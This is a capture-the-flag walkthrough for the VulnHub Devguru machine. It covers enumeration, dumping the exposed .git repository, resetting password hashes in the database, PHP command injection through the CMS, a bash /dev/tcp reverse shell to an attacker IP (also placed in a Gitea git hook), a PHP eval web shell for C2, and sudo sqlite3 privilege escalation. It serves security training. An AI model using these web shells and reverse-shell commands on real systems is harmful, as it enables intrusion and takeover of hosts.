VulnHub - Devguru
Information Gathering

Port Scan

| Port     | Service | Version                                             |
|----------|---------|-----------------------------------------------------|
| 22/tcp   | ssh     | OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |
| 80/tcp   | http    | Apache httpd 2.4.29 ((Ubuntu))                      |
| 8585/tcp | unknown | unknown                                             |
Web Path Enumeration

Port 80

```bash
dirsearch -u "http://192.168.0.106" -t 60 -e * -x 404,403 --json-report report/output/dirsearch_80_output.json
```

```text
[11:41:56] 301 - 316B - /plugins -> http://192.168.0.106/plugins/
[11:41:57] 301 - 313B - /.git -> http://192.168.0.106/.git/
[11:41:57] 200 - 13B - /.git/COMMIT_EDITMSG
[11:41:57] 200 - 23B - /.git/HEAD
[11:41:57] 200 - 276B - /.git/config
[11:41:57] 200 - 73B - /.git/description
[11:41:57] 200 - 308KB - /.git/index
[11:41:57] 200 - 240B - /.git/info/exclude
[11:41:57] 301 - 323B - /.git/logs/refs -> http://192.168.0.106/.git/logs/refs/
[11:41:57] 200 - 158B - /.git/logs/HEAD
[11:41:57] 301 - 331B - /.git/logs/refs/remotes -> http://192.168.0.106/.git/logs/refs/remotes/
[11:41:57] 301 - 338B - /.git/logs/refs/remotes/origin -> http://192.168.0.106/.git/logs/refs/remotes/origin/
[11:41:57] 200 - 158B - /.git/logs/refs/heads/master
[11:41:57] 200 - 142B - /.git/logs/refs/remotes/origin/master
[11:41:57] 301 - 329B - /.git/logs/refs/heads -> http://192.168.0.106/.git/logs/refs/heads/
[11:41:57] 301 - 324B - /.git/refs/heads -> http://192.168.0.106/.git/refs/heads/
[11:41:57] 301 - 326B - /.git/refs/remotes -> http://192.168.0.106/.git/refs/remotes/
[11:41:57] 200 - 41B - /.git/refs/heads/master
[11:41:57] 301 - 333B - /.git/refs/remotes/origin -> http://192.168.0.106/.git/refs/remotes/origin/
[11:41:57] 200 - 41B - /.git/refs/remotes/origin/master
[11:41:57] 301 - 323B - /.git/refs/tags -> http://192.168.0.106/.git/refs/tags/
[11:41:57] 200 - 413B - /.gitignore
[11:41:59] 200 - 2KB - /.htaccess
[11:42:10] 200 - 12KB - /0
[11:42:14] 200 - 18KB - /About
[11:42:16] 200 - 1KB - /README.md
[11:42:24] 200 - 18KB - /about
[11:42:32] 200 - 4KB - /adminer.php
[11:42:38] 302 - 410B - /backend/ -> http://192.168.0.106/backend/backend/auth
[11:42:44] 301 - 315B - /config -> http://192.168.0.106/config/
[11:43:01] 200 - 12KB - /index.php
[11:43:09] 301 - 316B - /modules -> http://192.168.0.106/modules/
[11:43:26] 200 - 10KB - /services/
[11:43:26] 200 - 10KB - /services
[11:43:28] 301 - 316B - /storage -> http://192.168.0.106/storage/
[11:43:31] 301 - 315B - /themes -> http://192.168.0.106/themes/
```

http://devguru.local/adminer.php

http://devguru.local/backend/backend/auth

Both backends require login credentials.

Port 8585

```bash
dirsearch -u "http://192.168.0.106:8585" -t 60 -e * -x 404,403 --json-report report/output/dirsearch_8585_output.json
```

```text
[11:45:00] Starting:
[11:45:15] 302 - 34B - /admin -> /user/login
[11:45:16] 302 - 34B - /admin/ -> /user/login
[11:45:16] 302 - 34B - /admin/?/login -> /user/login
[11:45:18] 200 - 575B - /api/swagger
[11:45:20] 302 - 27B - /css -> /css
[11:45:21] 200 - 160B - /debug
[11:45:21] 200 - 160B - /debug/
[11:45:22] 302 - 37B - /explore -> /explore/repos
[11:45:22] 302 - 29B - /fonts -> /fonts
[11:45:25] 302 - 27B - /img -> /img
[11:45:25] 302 - 34B - /issues -> /user/login
[11:45:25] 302 - 26B - /js -> /js
[11:45:26] 200 - 670B - /manifest.json
[11:45:27] 200 - 10KB - /explore/repos
[11:45:38] 200 - 9KB - /user/login/
```

git dump

Use git-dumper to download the repository:

```bash
git-dumper http://devguru.local/.git .
```

The database credentials are found in config/database.php; with them you can log in to the database admin backend:

http://devguru.local/backend/backend/auth

Vulnerability Discovery

Log in to the MySQL backend

The backend_users table contains a user credential whose hash cannot be cracked. Either replace the stored password hash with a new one directly, or add a new user credential.

Create a new user

Replace the password

Generate a new password hash and replace the uncracked one:

https://bcrypt-generator.com/

Exploitation

Command Execution

Under the CMS pages, open the HOME item and add the corresponding code in the Markup section.

In the Code section add the following:

```php
function onStart() {
    $this->page["runCmd"] = system($_GET["cmd"]);
}
```

After saving, choose Preview and execute a command:

http://devguru.local/?cmd=id

reverse shell

```bash
bash -c 'exec bash -i &>/dev/tcp/192.168.0.108/8848 <&1'
```

Post-Exploitation

C2

Use phpsploit

It is much more convenient than nc; metasploit also works.

Write the payload (into /var/www/html):

```bash
echo '<?php @eval($_SERVER["HTTP_PHPSPL01T"]); ?>' > shell.php
```

Configure the C2:

```text
> set TARGET http://devguru.local/shell.php
> exploit
```

Internal Information Gathering

Sensitive file found

Download app.ini.bak locally and inspect it; it contains the Gitea database credentials.

```text
> download app.ini.bak /tmp
```


Log in to MySQL

Log in to Gitea

go-gitea is open source, so locate the relevant code and generate a new password hash from it.

https://github.com/go-gitea/gitea/blob/master/models/user.go

```go
// Excerpt from Gitea's models/user.go: the hash algorithm is selected by the
// user's configured algo; pbkdf2 is the default branch.
func hashPassword(passwd, salt, algo string) string {
	var tempPasswd []byte

	switch algo {
	case algoBcrypt:
		tempPasswd, _ = bcrypt.GenerateFromPassword([]byte(passwd), bcrypt.DefaultCost)
		return string(tempPasswd)
	case algoScrypt:
		tempPasswd, _ = scrypt.Key([]byte(passwd), []byte(salt), 65536, 16, 2, 50)
	case algoArgon2:
		tempPasswd = argon2.IDKey([]byte(passwd), []byte(salt), 2, 65536, 8, 50)
	case algoPbkdf2:
		fallthrough
	default:
		tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)
	}

	return fmt.Sprintf("%x", tempPasswd)
}
```

Generate a new hash:

```go
package main

import (
	"crypto/sha256"
	"fmt"

	"golang.org/x/crypto/pbkdf2"
)

func main() {
	var tempPasswd []byte
	var passwd, salt string

	passwd = "callme"
	salt = "AaaaaBbbbb"

	// Same parameters as Gitea's default pbkdf2 branch: 10000 iterations, 50-byte key, SHA-256
	tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)
	fmt.Printf("%x\n", tempPasswd)
}
```

```text
f1558adac8fddf102f3d5caf42d8648ad01c4bd6d6041f2e7885cb164384031f1172939535eb6ae7ca190101638b4e59cfb7
```
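For an auditor checking how a Gitea instance stores and verifies pbkdf2 passwords, here is an added Python example (not from the page or from the Gitea project) that reproduces the same PBKDF2-HMAC-SHA256 parameters with the standard library and verifies a candidate password against a stored hex hash using a constant-time comparison. The password and salt are the ones from the Go program above; the function names are my own.

```python
import hashlib
import hmac

# Parameters of Gitea's default (pbkdf2) branch in hashPassword():
# 10000 iterations, 50-byte derived key, HMAC-SHA256.
PBKDF2_ITERATIONS = 10000
PBKDF2_KEY_LEN = 50


def gitea_pbkdf2_hash(passwd: str, salt: str) -> str:
    """Return the lowercase hex digest Gitea stores for algo pbkdf2."""
    key = hashlib.pbkdf2_hmac(
        "sha256",
        passwd.encode(),
        salt.encode(),
        PBKDF2_ITERATIONS,
        dklen=PBKDF2_KEY_LEN,
    )
    return key.hex()


def verify_gitea_password(stored_hex: str, passwd: str, salt: str) -> bool:
    """Check a candidate password against a stored hash without leaking timing."""
    try:
        stored = bytes.fromhex(stored_hex)
    except ValueError:
        return False  # malformed passwd column: never treat as a match
    if len(stored) != PBKDF2_KEY_LEN:
        return False  # wrong algorithm or truncated value
    candidate = bytes.fromhex(gitea_pbkdf2_hash(passwd, salt))
    return hmac.compare_digest(stored, candidate)


if __name__ == "__main__":
    # Same inputs as the Go program on this page.
    digest = gitea_pbkdf2_hash("callme", "AaaaaBbbbb")
    print(digest)
    print(verify_gitea_password(digest, "callme", "AaaaaBbbbb"))
```

Running it with these inputs should print the same digest as the Go program, which is a quick way to confirm that a hash written into the database was generated with the parameters Gitea actually uses.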


Further Exploitation

Remote Code Execution using git hooks

Search for related information: git hook reverse shell

Check the Gitea version

Write the command into the post-receive hook:

```bash
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/192.168.0.108/8848 <&1'
```

Next, run the following on the attacker PC:

Listen on the port

```bash
git clone http://devguru.local:8585/imin/shell.git
cd shell/
touch README.txt
git add .
git config user.name imin
git config user.email imin@devguru.local
git commit -m 'Add README.txt'
git push origin master
```

User.txt

Privilege Escalation

Gather privilege-escalation information

sudo -l

```text
User frank may run the following commands on devguru:
    (ALL, !root) NOPASSWD: /usr/bin/sqlite3
```

sqlite3 to shell:

The installed sudo version has a security bypass vulnerability.

exploit

root.txt
